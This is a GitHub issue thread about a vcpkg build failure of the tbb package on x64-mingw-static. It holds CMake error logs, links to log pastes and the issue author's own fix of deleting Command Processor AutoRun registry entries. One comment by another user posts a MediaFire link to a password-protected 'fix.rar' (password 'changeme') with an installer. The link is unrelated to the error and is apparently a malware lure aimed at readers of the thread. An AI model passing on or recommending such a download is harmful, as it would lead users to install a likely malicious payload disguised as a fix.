### ISSUE TITLE
[tbb] Build error on x64-mingw-static

### ISSUE THREAD

**Issue by creator1creeper1** [microsoft/vcpkg#40664]
Package: tbb:x64-mingw-static@2021.13.0

**Host Environment**

- Host: x64-windows
- Compiler: GNU 14.1.0
-    vcpkg-tool version: 2024-08-01-fd884a0d390d12783076341bd43d77c3a6a15658
    vcpkg-scripts version: df3e0e17e 2024-08-27 (5 hours ago)

**To Reproduce**

`vcpkg install tbb`

**Failure logs**

```
-- Using cached oneapi-src-oneTBB-v2021.13.0.tar.gz.
-- Cleaning sources at C:/Users/<user>/vcpkg/buildtrees/tbb/src/v2021.13.0-c5ed208c36.clean. Use --editable to skip cleaning for the packages you specify.
-- Extracting source C:/Users/<user>/vcpkg/downloads/oneapi-src-oneTBB-v2021.13.0.tar.gz
-- Using source at C:/Users/<user>/vcpkg/buildtrees/tbb/src/v2021.13.0-c5ed208c36.clean
-- Configuring x64-mingw-static
CMake Error at scripts/cmake/vcpkg_execute_required_process.cmake:127 (message):
    Command failed: C:/Users/<user>/vcpkg/downloads/tools/ninja/1.10.2-windows/ninja.exe -v
    Working Directory: C:/Users/<user>/vcpkg/buildtrees/tbb/x64-mingw-static-rel/vcpkg-parallel-configure
    Error code: 1
    See logs for more information:
      C:\Users\<user>\vcpkg\buildtrees\tbb\config-x64-mingw-static-dbg-CMakeCache.txt.log
      C:\Users\<user>\vcpkg\buildtrees\tbb\config-x64-mingw-static-rel-CMakeCache.txt.log
      C:\Users\<user>\vcpkg\buildtrees\tbb\config-x64-mingw-static-dbg-CMakeConfigureLog.yaml.log
      C:\Users\<user>\vcpkg\buildtrees\tbb\config-x64-mingw-static-rel-CMakeConfigureLog.yaml.log
      C:\Users\<user>\vcpkg\buildtrees\tbb\config-x64-mingw-static-out.log

Call Stack (most recent call first):
  installed/x64-mingw-static/share/vcpkg-cmake/vcpkg_cmake_configure.cmake:269 (vcpkg_execute_required_process)
  ports/tbb/portfile.cmake:17 (vcpkg_cmake_configure)
  scripts/ports.cmake:192 (include)



```

Here are the log files:

| File                                                                                          | PasteBin Link                 |
|-----------------------------------------------------------------------------------------------|-------------------------------|
| `C:/Users/<user>/vcpkg/installed/vcpkg/issue_body.md`                                         | https://pastebin.com/KGhPaR1r |
| `C:\Users\<user>\vcpkg\buildtrees\tbb\config-x64-mingw-static-rel-CMakeConfigureLog.yaml.log` | https://pastebin.com/CM3kysi8 |
| `C:\Users\<user>\vcpkg\buildtrees\tbb\config-x64-mingw-static-rel-CMakeCache.txt.log`         | https://pastebin.com/bkJkstb2 |
| `C:\Users\<user>\vcpkg\buildtrees\tbb\config-x64-mingw-static-out.log`                        | https://pastebin.com/GkbrQwYs |
| `C:\Users\<user>\vcpkg\buildtrees\tbb\config-x64-mingw-static-dbg-CMakeConfigureLog.yaml.log` | https://pastebin.com/UZDx7Wnt |
| `C:\Users\<user>\vcpkg\buildtrees\tbb\config-x64-mingw-static-dbg-CMakeCache.txt.log`         | https://pastebin.com/qgDL3vJc |

---

StackExchange Post: https://stackoverflow.com/questions/78919538

**Comment by yiweifengyan** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by creator1creeper1** [comment]
I was able to resolve the issue by deleting the following registry entries:
* `HKEY_CURRENT_USER\Software\Microsoft\Command Processor\AutoRun`
* `HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor\AutoRun`

The following issues seem to be related:
* [The system cannot find the path specified](ninja-build/ninja#2193) (ninja-build/ninja#2193)
* [[BUG] It is not able to compile a simple test program.](android/ndk#1363) (android/ndk#1363)
* [CMake does not accept MinGW compilers](https://stackoverflow.com/questions/63673079/cmake-does-not-accept-mingw-compilers)
* [Cmake with MinGW fails compile test](https://stackoverflow.com/questions/9585330/cmake-with-mingw-fails-compile-test)
* [Android Studio Cmake: "The C compiler clang.exe is not able to compile a simple test program](https://stackoverflow.com/questions/44537449/android-studio-cmake-the-c-compiler-clang-exe-is-not-able-to-compile-a-simple)
* [CMake building for Windows (clang-cl) using Ninja Generator](https://stackoverflow.com/questions/52760801/cmake-building-for-windows-clang-cl-using-ninja-generator)
* [MinGW Make throwing "The system cannot find the path specified." error](https://stackoverflow.com/questions/29450556/mingw-make-throwing-the-system-cannot-find-the-path-specified-error)
